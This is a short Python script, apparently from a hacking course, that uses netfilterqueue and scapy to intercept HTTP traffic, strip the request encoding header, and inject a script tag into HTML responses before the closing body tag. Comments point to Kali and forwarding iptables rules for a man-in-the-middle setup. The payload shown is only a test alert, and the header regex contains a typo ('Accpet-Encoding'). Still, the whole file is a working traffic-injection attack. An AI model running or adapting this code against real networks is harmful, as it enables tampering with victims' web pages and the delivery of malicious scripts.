#!/usr/bin/env python
import subprocess
import netfilterqueue
import scapy.all as scapy
import re


def set_load(packet, load):
    packet[scapy.Raw].load = load
    del packet[scapy.IP].len
    del packet[scapy.IP].chksum
    del packet[scapy.TCP].chksum
    return packet


def process_packet(packet):
    scapy_packet = scapy.IP(packet.get_payload())
    if scapy_packet.haslayer(scapy.Raw):
        load = scapy_packet[scapy.Raw].load
        if scapy_packet[scapy.TCP].dport == 80:
            load = re.sub("Accpet-Encoding:.*?\\r\\n", " ", str(load))
            load = bytes(load, encoding='utf8')
        elif scapy_packet[scapy.TCP].sport == 80:
            print(scapy_packet.show())
            injectionCode = "<script>alert('test');</script>"
            load = str(load).replace("</body>", injectionCode + "</body>")
            load = bytes(load, encoding='utf8')
            contentLength = re.search("(?:Content-Length:\s)(\d*)", str(load))
            if contentLength and "text/html" in str(load):
                contentLength = contentLength.group(1)
                newContentLength = int(contentLength) + len(injectionCode)
                load = str(load).replace(contentLength, str(newContentLength))
                load = bytes(load, encoding='utf8')
        if load != scapy_packet[scapy.Raw].load:
            newPacket = set_load(scapy_packet, load)
            packet.set_payload(bytes(newPacket))
    packet.accept()


try:
    queueNum = input("Please enter the queue number ")
    subprocess.call(['iptables', '-I', 'INPUT', '-j', 'NFQUEUE', '--queue-num', queueNum])
    subprocess.call(['iptables', '-I', 'OUTPUT', '-j', 'NFQUEUE', '--queue-num', queueNum])
    # subprocess.call(['iptables', '-I', 'FORWARD', '-j', 'NFQUEUE', '--queue-num', queueNum])
    queue = netfilterqueue.NetfilterQueue()
    queue.bind(int(queueNum), process_packet)
    queue.run()
except(KeyboardInterrupt):
    print('[+] Keyboard interrupt detected ... Resetting IP Tables')
    subprocess.call(['iptables', '--flush'])
# iptables -I FORWARD -j NFQUEUE --queue-num 0
# web server on kali command (service apache2 start)
# sudo systemctl enable systemd-resolved.service
# sudo systemd-resolve --flush-caches
